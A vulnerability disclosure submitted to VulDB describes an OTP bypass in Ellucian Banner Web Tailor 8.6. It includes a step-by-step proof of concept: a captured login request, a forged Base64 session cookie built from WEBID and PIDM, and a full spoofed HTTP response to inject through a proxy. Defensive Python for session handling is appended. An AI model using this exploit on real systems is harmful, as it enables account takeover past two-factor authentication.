Submit #105548: OTP Bypass code at Ellucian banner web tailor 8.6

Title: OTP Bypass code at Ellucian banner web tailor 8.6
Description:

## INTRO

An OTP bypass in the OTP page of Ellucian banner web tailor 8.6 allows an attacker to bypass the OTP code via the OTP page.

The vulnerable service is `Ellucian banner web tailor 8.6`.

The vulnerable location is the `OTP page`.

## Summary

When you access the `Login page` and have entered your credentials, you are directed to the `OTP page`. Here we can manipulate the response to bypass the validation request for the OTP. The vulnerability is on the `OTP request page`.

> The technique that we use for the bypass is `response manipulation`

## PoC

First of all, we just need to put in the right credentials; it will then redirect you to `The OTP page`.

Second, put any random number in the OTP input. The request will look like this:

```
POST /PROD_ar/twbkwbis.P_FirstMenu HTTP/1.1
Host: 127.0.0.1:7710
Cookie: <Some-C00kies>.......
Content-Length: 139
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://127.0.0.1:7710
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://127.0.0.1:7710/PROD_ar/twbkwbis.P_ValLogin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

PIDM=1234724&WEBID=PGCO8W&RET_CODE=&VerC=1212&usage_btn=Submit&usage_btn=Submit
```

Now we just need to focus on two parameters in the POST request:

```
PIDM=1234724&WEBID=PGCO8W
```

With these two values, we can generate new sessions for ourselves to use in the response manipulation technique.

> Note: the server encodes the sessions with Base64.

Take the two values and generate a new session:

```
PIDM=1234724&WEBID=PGCO8W

Split:
PGCO8W
1234724

Then make it in one line:
PGCO8W1234724

Encode it "Base64":
UEdDTzhXMTIzNDcyNA==
```

### Steps to do the attack

1. Turn on "Do intercept" under Proxy > Intercept in Burp Suite to capture the response.
2. Then replace the whole response with this one (a valid response taken from a valid access):

```
HTTP/1.1 200 OK
Date: Fri, 24 Mar 2023 20:46:27 GMT
Content-Length: 316
Set-Cookie: SESSID=UEdDTzhXMTIzNDcyNA==
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Strict-Transport-Security: max-age=16070400; includeSubDomains
Set-Cookie: <Some-C00kies>.......

<HTML>
<HEAD>
<meta http-equiv="refresh" content="0;url=/PROD_ar/twbkwbis.P_GenMenu?name=bmenu.P_MainMnu&amp;msg=WELCOME!">
</HEAD>
</HTML>
```

> In the header: "Set-Cookie: SESSID=`the session we generate`"

Finally, it will redirect you to the Dashboard.

## Impact

An attacker can bypass the OTP code when they try to exploit the account.
User: Naif (UID 43704)
Submission: 24.03.2023 23:36 (3 years ago)
Moderation: 25.03.2023 17:05 (17 hours later)
Status: Accepted
VulDB entry: 224014 [Ellucian Banner Web Tailor 8.6 Login Page twbkwbis.P_FirstMenu PIDM/WEBID privilege escalation]
Points: 17
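
The defensive counterpart to the issue described in the submission, as an added Python example that is not part of the submission or of Ellucian's code. `is_derivable_token` is an audit check for session cookies that are only Base64(WEBID + PIDM); `SessionStore` and its method names are hypothetical and show random session IDs with the OTP-verified flag held on the server, so a response altered in the browser or a proxy does not change what the server authorizes.

```python
import base64
import binascii
import hmac
import secrets


def is_derivable_token(cookie: str, webid: str, pidm: str) -> bool:
    """Audit check: is the session cookie merely Base64(WEBID + PIDM)?"""
    try:
        decoded = base64.b64decode(cookie, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return False
    return decoded == webid + pidm


class SessionStore:
    """Hypothetical server-side store; the OTP state never leaves the server."""
    MAX_TRIES = 5

    def __init__(self):
        self._sessions = {}

    def begin_login(self, pidm: str) -> str:
        """Called after the password check: issue a random, unguessable ID."""
        sid = secrets.token_urlsafe(32)
        otp = f"{secrets.randbelow(10**6):06d}"  # sent out of band in practice
        self._sessions[sid] = {"pidm": pidm, "otp": otp,
                               "tries": 0, "otp_verified": False}
        return sid

    def verify_otp(self, sid: str, code: str) -> bool:
        s = self._sessions.get(sid)
        if s is None or s["tries"] >= self.MAX_TRIES:
            return False
        s["tries"] += 1
        if hmac.compare_digest(s["otp"].encode(), code.encode()):
            s["otp_verified"] = True
        return s["otp_verified"]

    def authorize(self, sid: str) -> bool:
        """Gate every post-login page on server-side state only."""
        s = self._sessions.get(sid)
        return bool(s and s["otp_verified"])


# Constructed sample: the cookie value shown in the submission above.
SAMPLE_COOKIE = "UEdDTzhXMTIzNDcyNA=="
```
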
